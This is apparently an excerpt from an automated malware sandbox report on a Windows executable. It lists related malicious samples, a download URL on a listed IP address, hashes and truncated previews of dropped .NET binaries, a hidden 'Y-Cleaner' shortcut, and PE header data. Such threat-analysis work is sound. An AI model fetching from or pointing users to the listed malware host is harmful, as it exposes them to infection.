                                                          8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23/soft/download
                                                          BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23/soft/download
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          RELDAS-NETRUzmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23
                                                          8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23
                                                          BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23
                                                          beacon.exeGet hashmaliciousCobaltStrikeBrowse
                                                          • 185.156.73.37
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                                            BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.9838720154494586
                                                                              Encrypted:false
                                                                              SSDEEP:96:b5RHM3METlszhNR7YjSYQXIDcQ1c6zcEBcw3LQ+HbHg/8BRTf3Oy1oVazW0H9nF3:b/lETlI0737fRjud3szuiFZZ24IO8a
                                                                              MD5:C355D360B53DF032AD6E27CE19D44D5E
                                                                              SHA1:8067180C1323EB9A1A316A949A24D73966BB4245
                                                                              SHA-256:17689506B5448441005A293804311129501508F7CADFF794FA573C1A51A1C18D
                                                                              SHA-512:981573569E49EF06714B61E85917AB7A66D568F0321FB3F20EEA1060DE742344C0A156748295D496BE6D5E866A302247034DE175A87DC92F8CEF53173135D3E1
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.2.1.0.4.3.5.8.8.4.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.2.1.0.6.7.8.0.7.2.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.b.d.5.e.e.f.-.6.d.0.6.-.4.d.7.d.-.9.2.9.d.-.8.6.b.0.c.e.c.8.e.a.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.3.4.3.1.f.d.-.9.f.2.6.-.4.8.a.a.-.a.d.8.2.-.9.0.f.d.4.3.4.d.8.3.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.I.3.n.4.L.S.H.B.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.c.1.a.2.-.a.c.b.1.f.3.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.a.c.b.e.f.1.5.9.c.4.e.e.3.8.3.b.6.9.8.7.7.b.8.4.2.3.5.8.d.e.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.8.8.2.f.3.3.c.5.d.f.5.c.4.9.8.2.5.2.e.4.c.b.1.4.9.f.f.a.1.1.b.d.a.9.b.6.2.3.!.d.I.3.n.4.L.S.H.B.7...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:28:26 2024, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):46484
                                                                              Entropy (8bit):2.548749541480262
                                                                              Encrypted:false
                                                                              SSDEEP:192:LP+tEdZXQwtEXTlT92Oio+Ibwt9p67nt6NkM48scKGXgSajZ+u/TVOEBHiKJS6+8:7+TwtqlTzP+o+6Dt6NTolj1/ZVQGzo
                                                                              MD5:58D60A7310B132897F531C455329B4B0
                                                                              SHA1:1050A8B6DB82D6E1532FBC80F0CCAB4EBE0AD167
                                                                              SHA-256:3F6A438F664EDB62A79860EEAB3BFD59E5E91AD0686AA442EAEDC26DDC659240
                                                                              SHA-512:E9BFBA7E11801990723E284401254FC7712C2E8ED6066F7B782A8778DF86399F73B2FEDB3B717B461F4E385055A12803A795322C30AD5DCA6DC5C82543ACE708
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:MDMP..a..... .........eg............4...........8...<.......D....,..........T.......8...........T...........(B..ls..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......|....eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8398
                                                                              Entropy (8bit):3.694974781568798
                                                                              Encrypted:false
                                                                              SSDEEP:192:R6l7wVeJ+16SkU6Y9bSU9N67gmfyS9pDT89bl8sf5Xm:R6lXJk666YhSU9N67gmfyZlPf0
                                                                              MD5:DDBBA7FFE15AED8F2EBC2627811F8217
                                                                              SHA1:7698CFEE329938A54D463D59F58A586ED737A1D3
                                                                              SHA-256:38E46BA6932A3CF2DC23DAC3168F6B1D816FC6B1846E8F8183CEA7CC99941A6F
                                                                              SHA-512:B5669DE970BD4B90816375EF6104A07B6B420A316B9E6BA8D4C172E5C890549DF3297477C9E93BB615FE02C34DD543E883F314C77A38D434A44D61FC121EB57E
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4680
                                                                              Entropy (8bit):4.464075354610673
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zs3Jg77aI9hGWpW8VYxYm8M4J0PF74+q8vrM7MhSzAfd:uIjfZI7fH7VJJQ4KY7M8zAfd
                                                                              MD5:61DDA0B2573386024742317F0F020CFB
                                                                              SHA1:9C3334D2687B2EF8FCE5197EC6A1D4E095291AF3
                                                                              SHA-256:18BA8203803FA4C9BF09B6F27AEFCB9A2CD0475ADD5D0B5748E831C1E14F2BD2
                                                                              SHA-512:08E88FCAE4CB084FF5529E84D7BEC9DAA242D26CA3C6D2D35C0D778D573FFAECCEAC0A0BC77F44C6770C8C7A1DF96A01D9CC2D35C96E76BB671A5AB5561B0A3E
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639751" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:V:V
                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:0
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):242176
                                                                              Entropy (8bit):6.47050397947197
                                                                              Encrypted:false
                                                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                                              • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Reputation:high, very likely benign file
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:V:V
                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                              Malicious:false
                                                                              Preview:0
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):97296
                                                                              Entropy (8bit):7.9982317718947025
                                                                              Encrypted:true
                                                                              SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                              MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                              SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                              SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                              SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                              Malicious:false
                                                                              Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:V:V
                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                              Malicious:false
                                                                              Preview:0
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):21
                                                                              Entropy (8bit):3.880179922675737
                                                                              Encrypted:false
                                                                              SSDEEP:3:gFsR0GOWW:gyRhI
                                                                              MD5:408E94319D97609B8E768415873D5A14
                                                                              SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                              SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                              SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                              Malicious:false
                                                                              Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1502720
                                                                              Entropy (8bit):7.646111739368707
                                                                              Encrypted:false
                                                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):242176
                                                                              Entropy (8bit):6.47050397947197
                                                                              Encrypted:false
                                                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1502720
                                                                              Entropy (8bit):7.646111739368707
                                                                              Encrypted:false
                                                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                              Process:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:28:20 2024, mtime=Fri Dec 20 14:28:20 2024, atime=Fri Dec 20 14:28:20 2024, length=1502720, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2142
                                                                              Entropy (8bit):3.81633539333321
                                                                              Encrypted:false
                                                                              SSDEEP:48:8PvrR4rBsxwwvNRDBC19DBCaZMqDBC7yF:8nl4r4Nlo7Uy
                                                                              MD5:0D8206CCBBB291DD4539FCEFF9902657
                                                                              SHA1:D5F616FC7BEA5B804240D75D4987DAACE30D2118
                                                                              SHA-256:F8D3267DB7AC1853162BF71DD64271C88368944BBD7C27A3547A8EC1630B3F62
                                                                              SHA-512:8A663AD53ED02DDB3B659869F81EA0E1CD521CCB30F35642F4CCAB8E0EF6980FF93B57B4067A96CF4C450C1856BF11E9E39AF03ACE3AFAA87D63AD9AD2B223B3
                                                                              Malicious:false
                                                                              Preview:L..................F.@.. ...gy...R..gy...R..gy...R..........................,.:..DG..Yr?.D..U..k0.&...&......vk.v.....w...R..E."..R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yq{...........................%..A.p.p.D.a.t.a...B.P.1......Yo{..Local.<......CW.^.Yq{....b.....................+...L.o.c.a.l.....N.1......Yq{..Temp..:......CW.^.Yq{....l......................5..T.e.m.p.....h.1......Y.{..EEWF3Z~1..P......Y.{.Y.{...........................*.e.E.w.f.3.Z.G.9.f.B.W.Y.D.5.w.....h.2......Y.{ .Y-CLEA~1.EXE..L......Y.{.Y.{....Y......................u..Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m............"Xy.....C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.3.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.E.w.f.3.Z.G.9.f.B.W.Y.D.5.w.\.Y.-.C.l.e.a.n.e.r...e.x.e.?.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.E.w.f.3.Z.G.9.f.B.W.Y.D.5.w.\.Y.-.C.l.e.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):1835008
                                                                              Entropy (8bit):4.465459375463516
                                                                              Encrypted:false
                                                                              SSDEEP:6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSb2:MXD94+WlLZMM6YFHg+2
                                                                              MD5:61929AB808D0FD5A69C5D75F7774481A
                                                                              SHA1:A0FF895C28C8A3C29FFA4FA3CF5AB96A98AC8687
                                                                              SHA-256:D8CD66D4FC36BFDCE805FD7F1532E61FB0EFE98216C131407BDBDB4B4CA368E3
                                                                              SHA-512:289984FDA434E91CA438DA5CBDED0896F6008074512EE84CD59EA31630AA3CDEB801F32D88EF66276C41D13652F4D351BEA05B92A94BCB17F8D8A1E7560B8729
                                                                              Malicious:false
                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c...R..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.943090048480897
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:dI3n4LSHB7.exe
                                                                              File size:1'945'600 bytes
                                                                              MD5:2725f2b0ffa89f08642d36caf06c3ce4
                                                                              SHA1:bf882f33c5df5c498252e4cb149ffa11bda9b623
                                                                              SHA256:7be3016ad7251eda873c02c362243710b73620c595a9ca34bd0a7c0f2055b11f
                                                                              SHA512:4bf1c33808847d251b811262ff5ac3e30958794ff6a7916e96f1af884a605c078ef62001181bfacdfc80907575bd73d42ee9be4e78c01d2e3fa9f9b8bee2942f
                                                                              SSDEEP:49152:KM0P7ca9GJZWlS/mS3J1NFOtMcGduNc0dwknye5GxFi30:VLMIT/FrjFsTHP5Gbi3
                                                                              TLSH:ED95330F88B77BA0CE46CB7FC956D3756209D97F1E8A8182AD0599FA64D72F210D7C80
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...
                                                                              Icon Hash:e7a99a8a8651790c
                                                                              Entrypoint:0xc65000
                                                                              Entrypoint Section:.taggant
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                              Instruction
                                                                              jmp 00007FF4C0DB06BAh
                                                                              jng 00007FF4C0DB06D3h
                                                                              add byte ptr [eax], al
                                                                              jmp 00007FF4C0DB26B5h
                                                                              add byte ptr [esi], al
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
